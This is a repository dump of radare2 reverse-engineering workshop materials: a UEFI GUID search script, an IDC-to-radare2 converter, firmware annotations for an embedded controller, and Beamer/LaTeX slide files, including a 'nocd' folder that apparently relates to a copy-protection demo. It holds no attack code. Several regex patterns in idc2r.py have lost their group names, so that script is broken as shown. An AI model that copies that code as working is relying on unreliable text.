/demos/Firmware/demo3_x86_uefi/PchMeUma.efi: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XVilka/hacklu/1f9b60c121c004897bf7e00b341de158e1b70e11/demos/Firmware/demo3_x86_uefi/PchMeUma.efi -------------------------------------------------------------------------------- /demos/Firmware/demo3_x86_uefi/S3Restore.efi: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XVilka/hacklu/1f9b60c121c004897bf7e00b341de158e1b70e11/demos/Firmware/demo3_x86_uefi/S3Restore.efi -------------------------------------------------------------------------------- /demos/Firmware/demo3_x86_uefi/SomeUefiFile.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XVilka/hacklu/1f9b60c121c004897bf7e00b341de158e1b70e11/demos/Firmware/demo3_x86_uefi/SomeUefiFile.bin -------------------------------------------------------------------------------- /demos/Firmware/demo3_x86_uefi/example.te: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XVilka/hacklu/1f9b60c121c004897bf7e00b341de158e1b70e11/demos/Firmware/demo3_x86_uefi/example.te -------------------------------------------------------------------------------- /demos/Firmware/demo3_x86_uefi/hp_image.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XVilka/hacklu/1f9b60c121c004897bf7e00b341de158e1b70e11/demos/Firmware/demo3_x86_uefi/hp_image.bin -------------------------------------------------------------------------------- /demos/Firmware/demo3_x86_uefi/hp_image_2.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XVilka/hacklu/1f9b60c121c004897bf7e00b341de158e1b70e11/demos/Firmware/demo3_x86_uefi/hp_image_2.bin -------------------------------------------------------------------------------- /demos/Firmware/demo3_x86_uefi/search_guids.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python2 2 | import r2pipe 3 | 4 | # GUIDs dictionaries 5 | import efiguids 6 | 7 | r2 = r2pipe.open(None) 8 | 9 | for name, guid in efiguids.GUIDs.iteritems(): 10 | b3b2b1b0, b5b4, b7b6, b8,b9,b10,b11,b12,b13,b14,b15 = guid 11 | 12 | b0 = b3b2b1b0 & 0xff 13 | b1 = (b3b2b1b0 & 0xff00) >> 8 14 | b2 = (b3b2b1b0 & 0xff0000) >> 16 15 | b3 = (b3b2b1b0 & 0xff000000) >> 24 16 | 17 | b4 = b5b4 & 0xff 18 | b5 = (b5b4 & 0xff00) >> 8 19 | 20 | b6 = b7b6 & 0xff 21 | b7 = (b7b6 & 0xff00) >> 8 22 | 23 | guid_part1 = "{0:x}{1:x}{2:x}{3:x}{4:x}{5:x}{6:x}{7:x}".format(b0,b1,b2,b3,b4,b5,b6,b7) 24 | guid_part2 = "{0:x}{1:x}{2:x}{3:x}{4:x}{5:x}{6:x}{7:x}".format(b8,b9,b10,b11,b12,b13,b14,b15) 25 | 26 | guid_search = "/xj " + guid_part1 + guid_part2 27 | 28 | for i in r2.cmdj(guid_search): 29 | print(type(i)) 30 | if isinstance(i,dict): 31 | print("Found {0} at 0x{1:x} offset\n".format(name, i[u'offset'])) 32 | # Removing the 'hit_*' flags, unneeded now 33 | r2_line = "f- @ 0x{0:x}".format(i[u'offset']) 34 | r2.cmd(r2_line) 35 | # Adding the flag with the GUID name 36 | r2_line = "f " + name + " 16 @ " + "0x{0:x}\n".format(i[u'offset']) 37 | r2.cmd(r2_line) 38 | # Markinf the GUID as a data 39 | r2_line = "Cd 16 @ " + "0x{0:x}\n".format(i[u'offset']) 40 | r2.cmd(r2_line) 41 | 42 | 43 | -------------------------------------------------------------------------------- /demos/Firmware/demo5_it8502e/ITE_IT8502E_F_G_V0_7_7_09042008_1COM.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XVilka/hacklu/1f9b60c121c004897bf7e00b341de158e1b70e11/demos/Firmware/demo5_it8502e/ITE_IT8502E_F_G_V0_7_7_09042008_1COM.pdf -------------------------------------------------------------------------------- /demos/Firmware/demo5_it8502e/idc2r.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | # radare - LGPL - Copyright 2013 - xvilka 4 | 5 | import re 6 | import sys 7 | 8 | class Func(object): 9 | # FIXME: parse ftype into params and values 10 | def __init__(self, name="unknown", params=[], values=[], address=0, size=0, ftype=""): 11 | self.name = name 12 | self.params = params 13 | self.values = values 14 | self.address = address 15 | self.size = size 16 | self.ftype = ftype 17 | 18 | class Llabel(object): 19 | def __init__(self, name="unknown", address=0): 20 | self.name = name 21 | self.address = address 22 | 23 | class Comm(object): 24 | def __init__(self, text="", address=0): 25 | self.text = text 26 | self.address = address 27 | 28 | class Enum(object): 29 | def __init__(self, name="unknown", members=[]): 30 | self.name = name 31 | self.members = members 32 | 33 | class Struct(object): 34 | def __init__(self, name="unknown", members=[]): 35 | self.name = name 36 | self.members = members 37 | 38 | class Union(object): 39 | def __init__(self, name="unknown", members=[]): 40 | self.name = name 41 | self.members = members 42 | 43 | class Type(object): 44 | def __init__(self, name="unknown"): 45 | self.name = name 46 | self.members = members 47 | 48 | # ----------------------------------------------------------------------- 49 | 50 | functions = [] 51 | llabels = [] 52 | comments = [] 53 | structs = [] 54 | enums = [] 55 | types = [] 56 | 57 | def functions_parse(idc): 58 | 59 | # MakeFunction (0XF3C99,0XF3CA8); 60 | mkfun_re = re.compile(""" 61 | (?m) # Multiline 62 | ^[ \t]*MakeFunction[ \t]*\( 63 | (?P0[xX][\dA-Fa-f]{1,8}) # Function start 64 | [ \t]*\,[ \t]* 65 | (?P0[xX][\dA-Fa-f]{1,8}) # Function end 66 | [ \t]*\);[ \t]*$ 67 | """, re.VERBOSE) 68 | mkfun_group_name = dict([(v,k) for k,v in mkfun_re.groupindex.items()]) 69 | mkfun = mkfun_re.finditer(idc) 70 | for match in mkfun : 71 | fun = Func() 72 | for group_index,group in enumerate(match.groups()) : 73 | if group : 74 | if mkfun_group_name[group_index+1] == "fstart" : 75 | fun.address = int(group, 16) 76 | if mkfun_group_name[group_index+1] == "fend" : 77 | fun.size = int(group, 16) - fun.address 78 | 79 | functions.append(fun) 80 | 81 | # SetFunctionFlags (0XF3C99, 0x400); 82 | mkfunflags_re = re.compile(""" 83 | (?m) # Multiline 84 | ^[ \t]*SetFunctionFlags[ \t*]\( 85 | (?P0[xX][\dA-Fa-f]{1,8}) # Function start 86 | [ \t]*\,[ \t]* 87 | (?P0[xX][\dA-Fa-f]{1,8}) # Flags 88 | [ \t]*\);[ \t]*$ 89 | """, re.VERBOSE) 90 | mkfunflags_group_name = dict([(v,k) for k,v in mkfunflags_re.groupindex.items()]) 91 | mkfunflags = mkfunflags_re.finditer(idc) 92 | for match in mkfunflags : 93 | for group_index,group in enumerate(match.groups()) : 94 | if group : 95 | if mkfunflags_group_name[group_index+1] == "fstart" : 96 | addr = int(group, 16) 97 | if mkfunflags_group_name[group_index+1] == "flags" : 98 | for fun in functions : 99 | if fun.address == addr : 100 | pass # TODO: parse flags 101 | 102 | 103 | # MakeFrame (0XF3C99, 0, 0, 0); 104 | # MakeName (0XF3C99, "SIO_port_setup_S"); 105 | mkname_re = re.compile(""" 106 | (?m) # Multiline 107 | ^[ \t]*MakeName[ \t]*\( 108 | (?P0[xX][\dA-Fa-f]{1,8}) # Function start 109 | [ \t]*\,[ \t]* 110 | "(?P.*)" # Function name 111 | [ \t]*\);[ \t]*$ 112 | """, re.VERBOSE) 113 | mkname_group_name = dict([(v,k) for k,v in mkname_re.groupindex.items()]) 114 | mkname = mkname_re.finditer(idc) 115 | for match in mkname : 116 | for group_index,group in enumerate(match.groups()) : 117 | if group : 118 | if mkname_group_name[group_index+1] == "fstart" : 119 | addr = int(group, 16) 120 | if mkname_group_name[group_index+1] == "fname" : 121 | for fun in functions : 122 | if fun.address == addr : 123 | fun.name = group 124 | 125 | # SetType (0XFFF72, "__int32 __cdecl PCI_ByteWrite_SL(__int32 address, __int32 value)"); 126 | mkftype_re = re.compile(""" 127 | (?m) # Multiline 128 | ^[ \t]*SetType[ \t]*\( 129 | (?P0[xX][\dA-Fa-f]{1,8}) # Function start 130 | [ \t]*\,[ \t]* 131 | "(?P.*)" # Function type 132 | [ \t]*\);[ \t]*$ 133 | """, re.VERBOSE) 134 | mkftype_group_name = dict([(v,k) for k,v in mkftype_re.groupindex.items()]) 135 | mkftype = mkftype_re.finditer(idc) 136 | for match in mkftype : 137 | for group_index,group in enumerate(match.groups()) : 138 | if group : 139 | if mkftype_group_name[group_index+1] == "fstart" : 140 | addr = int(group, 16) 141 | if mkftype_group_name[group_index+1] == "ftype" : 142 | for fun in functions : 143 | if fun.address == addr : 144 | fun.ftype = group 145 | 146 | # MakeNameEx (0xF3CA0, "return", SN_LOCAL); 147 | mklocal_re = re.compile(""" 148 | (?m) # Multiline 149 | ^[ \t]*MakeNameEx[ \t]*\( 150 | (?P0[xX][\dA-Fa-f]{1,8}) # Local label address 151 | [ \t]*\,[ \t]* 152 | "(?P.*)" # Local label name 153 | [ \t]*\,[ \t]*SN_LOCAL 154 | [ \t]*\);[ \t]*$ 155 | """, re.VERBOSE) 156 | mklocal_group_name = dict([(v,k) for k,v in mklocal_re.groupindex.items()]) 157 | mklocal = mklocal_re.finditer(idc) 158 | for match in mklocal : 159 | lab = Llabel() 160 | for group_index,group in enumerate(match.groups()) : 161 | if group : 162 | if mklocal_group_name[group_index+1] == "laddr" : 163 | lab.address = int(group, 16) 164 | if mklocal_group_name[group_index+1] == "lname" : 165 | lab.name = group 166 | llabels.append(lab) 167 | 168 | # ---------------------------------------------------------------------- 169 | 170 | def enums_parse(idc): 171 | pass 172 | 173 | # ---------------------------------------------------------------------- 174 | 175 | def structs_parse(idc): 176 | # id = AddStrucEx (-1, "struct_MTRR", 0); 177 | mkstruct_re = re.compile(""" 178 | (?m) # Multiline 179 | ^[ \t]*id[ \t]*=[ \t]*AddStrucEx[ \t]*\( 180 | [ \t]*-1[ \t]*,[ \t]* 181 | "(?P.*)" # Structure name 182 | [ \t]*\,[ \t]*0 183 | [ \t]*\);[ \t]*$ 184 | """, re.VERBOSE) 185 | mkstruct_group_name = dict([(v,k) for k,v in mkstruct_re.groupindex.items()]) 186 | mkstruct = mkstruct_re.finditer(idc) 187 | for match in mkstruct : 188 | s = Struct() 189 | for group_index,group in enumerate(match.groups()) : 190 | if group : 191 | if mkstruct_group_name[group_index+1] == "sname" : 192 | s.name = group 193 | structs.append(s) 194 | 195 | # Case 1: not nested structures 196 | # ============================= 197 | # id = GetStrucIdByName ("struct_header"); 198 | # mid = AddStructMember(id,"BCPNV", 0, 0x5000c500, 0, 7); 199 | # mid = AddStructMember(id,"_", 0X7, 0x00500, -1, 1); 200 | # mid = AddStructMember(id, "BCPNV_size",0X8, 0x004500, -1, 1); 201 | mkstruct_re = re.compile(""" 202 | (?m) # Multiline 203 | ^[ \t]*id[ \t]*=[ \t]*GetStrucIdByName[ \t]*\( 204 | [ \t]*-1[ \t]*,[ \t]* 205 | "(?P.*)" # Structure name 206 | [ \t]*\,[ \t]*0 207 | [ \t]*\);[ \t]*$ 208 | """, re.VERBOSE) 209 | 210 | # ---------------------------------------------------------------------- 211 | 212 | def comments_parse(idc): 213 | # MakeComm (0XFED3D, "PCI class 0x600 - Host/PCI bridge"); 214 | mkcomm_re = re.compile(""" 215 | (?m) # Multiline 216 | ^[ \t]*MakeComm[ \t]*\( 217 | (?P0[xX][\dA-Fa-f]{1,8}) # Comment address 218 | [ \t]*\,[ \t]* 219 | "(?P.*)" # Comment 220 | [ \t]*\);[ \t]*$ 221 | """, re.VERBOSE) 222 | mkcomm_group_name = dict([(v,k) for k,v in mkcomm_re.groupindex.items()]) 223 | mkcomm = mkcomm_re.finditer(idc) 224 | for match in mkcomm : 225 | for group_index,group in enumerate(match.groups()) : 226 | if group : 227 | if mkcomm_group_name[group_index+1] == "caddr" : 228 | address = int(group, 16) 229 | if mkcomm_group_name[group_index+1] == "ctext" : 230 | com_multi = group.split('\\n') 231 | for a in com_multi : 232 | com = Comm() 233 | com.address = address 234 | com.text = a 235 | comments.append(com) 236 | 237 | # ---------------------------------------------------------------------- 238 | 239 | # print("af+ 0x%08lx %d %s" % (func.address, func.size, func.name)) 240 | 241 | def generate_r2(): 242 | for f in functions : 243 | if f.name != "unknown" : 244 | print("af+ {0} {1} {2}".format(hex(f.address), f.size, f.name)) 245 | print("\"CCa {0} {1}\"".format(hex(f.address), f.ftype)) 246 | 247 | for l in llabels : 248 | if l.name != "unknown" : 249 | for f in functions : 250 | if (l.address > f.address) and (l.address < (f.address + f.size)) : 251 | print("f. {0} @ {1}".format(l.name, hex(l.address))) 252 | 253 | for c in comments : 254 | if c.text != "" : 255 | print("\"CCa {0} {1}\"".format(c.address, c.text)) 256 | 257 | # ---------------------------------------------------------------------- 258 | 259 | def idc_parse(idc): 260 | enums_parse(idc) 261 | structs_parse(idc) 262 | functions_parse(idc) 263 | comments_parse(idc) 264 | generate_r2() 265 | 266 | if __name__ == "__main__": 267 | if len(sys.argv) < 2: 268 | print("Usage: idc2r.py input.idc > output.r2") 269 | sys.exit(1) 270 | 271 | #print(sys.argv[1]) 272 | idc_file = open(sys.argv[1], "r") 273 | idc = idc_file.read() 274 | idc_parse(idc) 275 | -------------------------------------------------------------------------------- /demos/Firmware/demo5_it8502e/ite_it8502.asm: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XVilka/hacklu/1f9b60c121c004897bf7e00b341de158e1b70e11/demos/Firmware/demo5_it8502e/ite_it8502.asm -------------------------------------------------------------------------------- /demos/Firmware/demo5_it8502e/ite_it8502.lst: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XVilka/hacklu/1f9b60c121c004897bf7e00b341de158e1b70e11/demos/Firmware/demo5_it8502e/ite_it8502.lst -------------------------------------------------------------------------------- /demos/Firmware/demo5_it8502e/ite_it8502.r2: -------------------------------------------------------------------------------- 1 | CCa 0x9954 SMBUS_4P7USL 2 | af+ 0x9954 36 set_SMBus_frequency 3 | "CCa 0x995a 4.0s High Register (4P0USH)" 4 | "CCa 0x995e 300ns Register (300NS)" 5 | "CCa 0x9962 260ns Register (250NS)" 6 | "CCa 0x9966 25ms Register (25MS)" 7 | "CCa 0x996a 45.3s Low Register (45P3USL)" 8 | "CCa 0x996e 45.3s High Register (45P3USH)" 9 | "CCa 0x9972 4.7s and 4.0s High Register (4P7A4P0H)" 10 | 11 | s 0x9954 12 | -------------------------------------------------------------------------------- /demos/Firmware/demo5_it8502e/ite_it8502.rom: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XVilka/hacklu/1f9b60c121c004897bf7e00b341de158e1b70e11/demos/Firmware/demo5_it8502e/ite_it8502.rom -------------------------------------------------------------------------------- /demos/Firmware/demo5_it8502e/ite_it8502_from_ida.r2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XVilka/hacklu/1f9b60c121c004897bf7e00b341de158e1b70e11/demos/Firmware/demo5_it8502e/ite_it8502_from_ida.r2 -------------------------------------------------------------------------------- /demos/Firmware/demo5_it8502e/ite_it8502e.idb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XVilka/hacklu/1f9b60c121c004897bf7e00b341de158e1b70e11/demos/Firmware/demo5_it8502e/ite_it8502e.idb -------------------------------------------------------------------------------- /demos/Firmware/demo5_it8502e/ite_it8502e.idc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XVilka/hacklu/1f9b60c121c004897bf7e00b341de158e1b70e11/demos/Firmware/demo5_it8502e/ite_it8502e.idc -------------------------------------------------------------------------------- /demos/Firmware/demo5_it8502e/run_r2.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | r2 -a 8051 ite_it8502.rom 3 | -------------------------------------------------------------------------------- /demos/others/pfvdemo: -------------------------------------------------------------------------------- 1 | pr `pfv.pe_nt_image_headers32.optionalHeader.dataDirectory[4].size @ pe_nt_image_headers32` @ `pfv.pe_nt_image_headers32.optionalHeader.dataDirectory[4].virtualAddress @ pe_nt_image_headers32`+8 > pe_certificate ; !openssl pkcs7 -inform DER -print_certs -text -in pe_certificate -------------------------------------------------------------------------------- /drawstack.sty: -------------------------------------------------------------------------------- 1 | %% drawstack.sty 2 | % 3 | % v0 (2010) : draw stack. 4 | % v0.1 (2012) : draw structures outside stack. 5 | % 6 | %% Copyright 2010,2012 Matthieu Moy 7 | % 8 | % This work may be distributed and/or modified under the 9 | % conditions of the LaTeX Project Public License, either version 1.3 10 | % of this license or (at your option) any later version. 11 | % The latest version of this license is in 12 | % http://www.latex-project.org/lppl.txt 13 | % and version 1.3 or later is part of all distributions of LaTeX 14 | % version 2005/12/01 or later. 15 | % 16 | % This work has the LPPL maintenance status `maintained'. 17 | % 18 | % The Current Maintainer of this work is M. Matthieu Moy. 19 | % 20 | % This work consists of the files drawstack.sty and the example file 21 | % stack-example.tex. 22 | 23 | \NeedsTeXFormat{LaTeX2e} 24 | 25 | \ProvidesPackage{drawstack}[2010/08/06 Draw Execution Stack in LaTeX] 26 | 27 | \RequirePackage{tikz} 28 | \RequirePackage{ifthen} 29 | 30 | % Default styles definition. 31 | \tikzstyle{freecell}=[fill=green!10,draw=green!30!black] 32 | \tikzstyle{freestruct}=[fill=blue!10,draw=blue!30!black] 33 | \tikzstyle{occupiedcell}=[fill=green!10!red!10,draw=green!30!black] 34 | \tikzstyle{padding}=[fill=green!10!black!10,draw=green!30!black] 35 | \tikzstyle{highlight}=[draw=red!50!black,text=red!50!black] 36 | 37 | \DeclareOption{nocolor}{ 38 | \tikzstyle{freecell}=[fill=white!95!black,draw=black] 39 | \tikzstyle{freestruct}=[fill=white!93!black,draw=black] 40 | \tikzstyle{occupiedcell}=[fill=white!60!black,draw=black] 41 | \tikzstyle{padding}=[fill=white!90!black!10,draw=black] 42 | \tikzstyle{highlight}=[draw=black,text=black] 43 | } 44 | \ProcessOptions 45 | 46 | \pgfdeclarelayer{background layer} 47 | \pgfdeclarelayer{foreground layer} 48 | \pgfsetlayers{background layer,main,foreground layer} 49 | \usetikzlibrary{shapes} % ellipse 50 | \usetikzlibrary{snakes} % braces 51 | 52 | \newcounter{cellnb} 53 | \newcounter{structnb} 54 | \setcounter{cellnb}{0} 55 | 56 | \newcommand{\llcell}[3]{ 57 | \addtocounter{cellnb}{-#1} 58 | \setcounter{ptrnb}{0} 59 | \draw[#2] (0,\value{cellnb}) +(-2,-.5) rectangle +(2,-.5+#1); 60 | \draw (0,\value{cellnb}+#1/2-0.5) node(currentcell) {#3}; 61 | } 62 | \newcommand{\bigcell}[2]{ 63 | \llcell{#1}{freecell}{#2} 64 | \foreach \c in {2,...,#1} { 65 | \draw[freecell] 66 | (-2,\value{cellnb}+\c-1.5) -- (-1.7,\value{cellnb}+\c-1.5); 67 | \draw[freecell] 68 | (1.7,\value{cellnb}+\c-1.5) -- (2,\value{cellnb}+\c-1.5); 69 | } 70 | } 71 | \newcommand{\cell}[2][freecell]{% 72 | \llcell{1}{#1}{#2}} 73 | 74 | \newcommand{\separator}[1][freecell,very thick]{ 75 | \draw[#1] (0,\value{cellnb}) +(-2,-.5) -- +(2,-.5); 76 | } 77 | 78 | % Pointer to the next cell, useful if the next cell has size != 0. 79 | \newcommand{\cellptrnext}[1]{ 80 | \draw[<-,line width=0.7pt] (0,\value{cellnb}-1) +(2,\value{ptrnb}*0.1) -- +(2.5,\value{ptrnb}*0.45); 81 | \draw (2.5,\value{ptrnb}*0.5+\value{cellnb}-1) node[anchor=west] {#1}; 82 | \addtocounter{ptrnb}{1} 83 | } 84 | \newcounter{ptrnb} 85 | \newcommand{\cellptr}[1]{ 86 | \draw[<-,line width=0.7pt] (0,\value{cellnb}) +(2,\value{ptrnb}*0.1) -- +(2.5,\value{ptrnb}*0.45); 87 | \draw (2.5,\value{ptrnb}*0.5+\value{cellnb}) node[anchor=west] {#1}; 88 | \addtocounter{ptrnb}{1} 89 | } 90 | \newcommand{\esp}{\cellptr{\%esp}} 91 | \newcommand{\ebp}{\cellptr{\%ebp}} 92 | 93 | % like cellptr, but without the arrow 94 | \newcommand{\cellcom}[1]{ 95 | \draw (2.4,\value{ptrnb}*0.5+\value{cellnb}) node[anchor=west] {#1}; 96 | \addtocounter{ptrnb}{1} 97 | } 98 | % like cellcom, but on the left hand side 99 | \newcommand{\cellcomL}[1]{ 100 | \draw (-2,\value{ptrnb}*0.5+\value{cellnb}) node[anchor=east] {#1}; 101 | \addtocounter{ptrnb}{1} 102 | } 103 | 104 | \newcommand{\cellround}[1]{ 105 | \begin{pgfonlayer}{foreground layer} 106 | \draw[highlight] (0,\value{cellnb}) 107 | node[shape=ellipse,draw, minimum width=3cm, minimum height=0.9cm] 108 | (marked) {}; 109 | \draw[highlight] (0,\value{cellnb}) +(3,1.3) node[anchor=west] (textmarked) {#1}; 110 | \draw[highlight,->] (marked) -- (textmarked.text); 111 | \end{pgfonlayer} 112 | } 113 | 114 | \newcommand{\stacktop}[2][freecell]{ 115 | \setcounter{cellnb}{0} 116 | \ifthenelse{\equal{#2}{}}{}{ 117 | \draw (0,\value{cellnb}) node {#2}; 118 | \addtocounter{cellnb}{-1} 119 | } 120 | 121 | \draw[#1] (0,\value{cellnb}) 122 | +(-2,.5) -- +(-2,-.5) -- +(2,-.5) -- +(2,.5); 123 | \draw (0,\value{cellnb}) node{...}; 124 | } 125 | \newcommand{\stackbottom}[1][freecell]{ 126 | \addtocounter{cellnb}{-1} 127 | \draw[#1] (0,\value{cellnb}) 128 | +(-2,-.5) -- +(-2,+.5) -- +(2,+.5) -- +(2,-.5); 129 | \draw (0,\value{cellnb}) node{...}; 130 | } 131 | \newenvironment{drawstack}[1][]% 132 | {\begin{tikzpicture}[#1]\stacktop{}}% 133 | {\stackbottom\end{tikzpicture}} 134 | 135 | \newcommand{\bcell}[1]{\cell[occupiedcell]{#1}} 136 | \newcommand{\padding}[2]{\llcell{#1}{padding}{#2}} 137 | \newcommand{\bstacktop}[0]{\stacktop[occupiedcell]} 138 | \newcommand{\bstackbottom}[0]{\stackbottom[occupiedcell]} 139 | 140 | \newcounter{startframe} 141 | \newcommand{\startframe}[0]{ 142 | \setcounter{startframe}{\value{cellnb}} 143 | } 144 | \newcommand{\finishframe}[1]{ 145 | \draw[snake=brace, line width=0.6pt, segment amplitude=7pt] 146 | (-2,\value{cellnb}-0.5) -- (-2,\value{startframe}-0.5); 147 | \draw (-4.2cm,\value{cellnb}*0.5+\value{startframe}*0.5-0.5) node 148 | {\parbox{2cm}{% 149 | \begin{flushright} 150 | #1 151 | \end{flushright}}}; 152 | } 153 | \newcommand{\stackframe}[3]{ 154 | \draw[snake=brace] (-2,-#1-0.5) -- (-2,-#2-0.5); 155 | \draw (0, #1) node {#3}; 156 | } 157 | 158 | \newcommand{\drawstruct}[1]{ 159 | \setcounter{structnb}{0} 160 | \path #1 coordinate (structpos); 161 | \path (structpos) ++ (0,\value{structnb}) +(-1.6,-.5) coordinate (structtopleft); 162 | } 163 | 164 | \newcommand{\llstructcell}[3]{ 165 | \addtocounter{structnb}{-#1} 166 | \path (structpos) ++ (0,\value{structnb}) +(-1.6,-.5) coordinate (topleft); 167 | \path (structpos) ++ (0,\value{structnb}) +(-1.6,-.5+#1) coordinate (bottomleft); 168 | \path (structpos) ++ (0,\value{structnb}) +( 1.6,-.5+#1) coordinate (bottomright); 169 | \draw[#2] (topleft) rectangle (bottomright); 170 | \draw (structpos) ++ (0,\value{structnb}+#1/2-0.5) node (currentcell){#3}; 171 | } 172 | 173 | \newcommand{\structcell}[2][freestruct]{% 174 | \llstructcell{1}{#1}{#2} 175 | } 176 | 177 | \newcommand{\structname}[1]{ 178 | \path (structpos) ++ (0,\value{structnb}) +(-1.6,-.5) coordinate (structbottomleft); 179 | \draw (barycentric cs:structtopleft=.5,structbottomleft=.5) 180 | node[rotate=90,anchor=south] {#1}; 181 | } 182 | 183 | %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% 184 | -------------------------------------------------------------------------------- /nocd/AoE.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XVilka/hacklu/1f9b60c121c004897bf7e00b341de158e1b70e11/nocd/AoE.zip -------------------------------------------------------------------------------- /nocd/Makefile: -------------------------------------------------------------------------------- 1 | SRC = slides.tex 2 | PDF = slides.pdf 3 | AUX = slides.aux 4 | TEXC := xelatex 5 | TEXC_OPTS += -shell-escape 6 | 7 | .PHONY: clean install slides 8 | 9 | all: $(PDF) 10 | 11 | slides: $(PDF) 12 | 13 | $(AUX): 14 | $(TEXC) $(TEXC_OPTS) $(SRC) 15 | 16 | $(PDF): beamerthemem.sty $(AUX) $(SRC) 17 | $(TEXC) $(TEXC_OPTS) $(SRC) 18 | 19 | clean: 20 | @rm -f $(PDF) 21 | @git clean -xfd 22 | 23 | -------------------------------------------------------------------------------- /nocd/beamercolorthememetropolis.sty: -------------------------------------------------------------------------------- 1 | % Beamer mtheme 2 | % 3 | % Copyright 2014 Matthias Vogelgesang 4 | % Licensed under CC-BY-SA 4.0 International. 5 | % 6 | % The initial template comes from the HSRM beamer theme by Benjamin Weiss, which 7 | % you can find at https://github.com/hsrmbeamertheme/hsrmbeamertheme. 8 | % 9 | 10 | \ProvidesPackage{beamercolorthememetropolis} 11 | 12 | 13 | %}}} 14 | %{{{ --- Options ---------------------- 15 | 16 | \newif\if@beamer@metropolis@blockbg 17 | \@beamer@metropolis@blockbgfalse 18 | \DeclareOptionBeamer{blockbg}{\@beamer@metropolis@blockbgtrue} 19 | 20 | \DeclareOptionBeamer*{% 21 | \PackageWarning{beamercolorthememetropolis}{Unknown option `\CurrentOption'}% 22 | } 23 | 24 | \ProcessOptionsBeamer 25 | 26 | %}}} 27 | %{{{ --- Colors --------------------- 28 | 29 | % http://paletton.com/#uid=7050t0kkJkJsntwoyp6gYgoddc4 30 | 31 | \definecolor{mDarkBrown}{HTML}{604c38} 32 | \definecolor{mDarkTeal}{HTML}{23373b} 33 | 34 | \definecolor{mLightBrown}{HTML}{EB811B} 35 | \definecolor{mMediumBrown}{HTML}{C87A2F} 36 | 37 | \setbeamercolor{palette primary}{fg=mDarkTeal, bg=black!2} 38 | \setbeamercolor{palette secondary}{fg=white, bg=mDarkTeal} 39 | \setbeamercolor{palette quaternary}{fg=mDarkBrown} 40 | \setbeamercolor{palette tertiary}{fg=white, bg=mMediumBrown} 41 | 42 | \setbeamercolor{title}{parent=palette primary} 43 | \setbeamercolor{subtitle}{parent=palette primary} 44 | \setbeamercolor{author}{parent=palette primary} 45 | \setbeamercolor{date}{parent=palette primary} 46 | \setbeamercolor{institute}{parent=palette primary} 47 | 48 | \setbeamercolor{section title}{parent=palette primary} 49 | \setbeamercolor{frametitle}{parent=palette secondary} 50 | \setbeamercolor{background canvas}{parent=palette primary} 51 | \setbeamercolor{structure}{fg=mDarkTeal} 52 | 53 | \setbeamercolor{normal text}{fg=black!97} 54 | \setbeamercolor{alerted text}{fg=mLightBrown} 55 | 56 | \setbeamercolor{footnote}{fg=mDarkTeal!50} 57 | \setbeamercolor{footnote mark}{fg=.} 58 | \setbeamercolor{page number in head/foot}{fg=mDarkTeal} 59 | 60 | \if@beamer@metropolis@blockbg 61 | 62 | \setbeamercolor{block title}{use=palette primary,parent=palette primary,bg=palette primary.bg!80!fg} 63 | \setbeamercolor{block title alerted}{use={palette primary,alerted text},parent=palette primary,fg=alerted text.fg,bg=palette primary.bg!80!fg} 64 | \setbeamercolor{block title example}{use={palette primary,example text},parent=palette primary,fg=example text.fg,bg=palette primary.bg!80!fg} 65 | 66 | \setbeamercolor{block body}{use=block title,parent=normal text,bg=block title.bg!50} 67 | \setbeamercolor{block body alerted}{use={normal text,block body},parent=normal text,bg=block body.bg} 68 | \setbeamercolor{block body example}{use={normal text,block body},parent=normal text,bg=block body.bg} 69 | 70 | \fi 71 | 72 | \mode 73 | -------------------------------------------------------------------------------- /nocd/beamerfontthememetropolis.sty: -------------------------------------------------------------------------------- 1 | % Beamer mtheme 2 | % 3 | % Copyright 2014 Matthias Vogelgesang 4 | % Licensed under CC-BY-SA 4.0 International. 5 | % 6 | % The initial template comes from the HSRM beamer theme by Benjamin Weiss, which 7 | % you can find at https://github.com/hsrmbeamertheme/hsrmbeamertheme. 8 | % 9 | 10 | \ProvidesPackage{beamerfontthememetropolis} 11 | 12 | \RequirePackage[no-math]{fontspec} 13 | 14 | 15 | \defaultfontfeatures{Mapping=tex-text} 16 | \setsansfont[BoldFont={Fira Sans}]{Fira Sans Light} 17 | \setmonofont{Fira Mono} 18 | \newfontfamily\ExtraLight{Fira Sans ExtraLight} 19 | \newfontfamily\Light{Fira Sans Light} 20 | \newfontfamily\Book{Fira Sans} 21 | \newfontfamily\Medium{Fira Sans Medium} 22 | 23 | \AtBeginEnvironment{tabular}{\setsansfont[BoldFont={Fira Sans}, Numbers={Monospaced}]{Fira Sans Light}} 24 | 25 | \setbeamerfont{title}{family=\Book, size=\Large} 26 | \setbeamerfont{author}{family=\ExtraLight, size=\small} 27 | \setbeamerfont{date}{family=\ExtraLight, size=\small} 28 | 29 | \setbeamerfont{section title}{family=\Book, size=\Large} 30 | 31 | \setbeamerfont{block title}{family=\Book, size=\normalsize} 32 | \setbeamerfont{block title alerted}{family=\Book,size=\normalsize} 33 | 34 | \setbeamerfont{subtitle}{family=\Light, size=\fontsize{12}{14}} 35 | \setbeamerfont{frametitle}{family=\Book, size=\large} 36 | 37 | \setbeamerfont{caption}{size=\small} 38 | \setbeamerfont{caption name}{family=\Book} 39 | 40 | \setbeamerfont{description item}{family=\Book} 41 | 42 | \setbeamerfont{page number in head/foot}{size=\scriptsize} 43 | 44 | 45 | \linespread{1.15} 46 | -------------------------------------------------------------------------------- /nocd/beamerthemem.sty: -------------------------------------------------------------------------------- 1 | % Beamer mtheme 2 | % 3 | % Copyright 2014 Matthias Vogelgesang 4 | % 